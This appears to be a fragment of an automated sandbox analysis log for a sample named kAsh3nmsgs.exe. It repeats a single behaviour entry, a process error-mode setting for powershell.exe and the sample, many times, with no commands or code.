                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
